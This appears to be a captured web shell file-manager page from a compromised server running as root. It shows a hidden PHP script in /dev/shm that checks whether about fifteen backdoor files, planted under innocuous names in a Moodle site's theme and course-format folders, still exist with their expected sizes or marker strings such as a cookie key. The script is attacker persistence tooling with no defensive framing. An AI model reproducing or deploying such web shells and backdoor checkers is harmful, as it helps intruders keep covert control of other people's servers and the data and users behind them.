HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //dev/shm/.bind
<?php   $r = '/var/www/html/dda.sumar.com.py'; $x = ["/course/format/grid/classes/output/courseformat/csharp.php"=>"bd@@12823@@536",
"/course/format/grid/classes/output/courseformat/content/twitter.php"=>"bd@@12569@@_COOKIE[3]",
"/theme/moove/classes/output/core_user/myprofile.renderer.php"=>"bd@@12860@@683",
"/theme/moove/db/install.php"=>"bd@@12356@@auth_exception_handler",
"/theme/moove/version.php"=>"bd@@5703@@unit_converter",
"/theme/moove/classes/output/core_course/activity.navigation.php"=>"bd@@12872@@715",
"/course/format/remuiformat/classes/output/courseformat/content/section/RenameFolder.php"=>"bd@@6225@@536",
"/course/format/remuiformat/classes/privacy/pclzip.lib.php"=>"bd@@12882@@1035",
"/theme/moove/db/services.php"=>"bd@@5975@@api_gateway",
"/course/format/remuiformat/classes/output/card.one.section.summary.php"=>"bd@@12909@@680",
"/course/format/remuiformat/classes/output/courseformat/galaxy.php"=>"bd@@6543@@1030",
"/course/format/grid/classes/output/courseformat/content/section/lib_editor.php"=>"bd@@6293@@534",
"/course/format/grid/form/sectionfilemanager.php"=>"bd@@12701@@Authorization",
"/course/format/remuiformat/classes/output/courseformat/content/vbulletin30.inc.php"=>"bd@@6387@@537",
"/theme/moove/.github/ele_select.php"=>"bd@@4858@@536"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');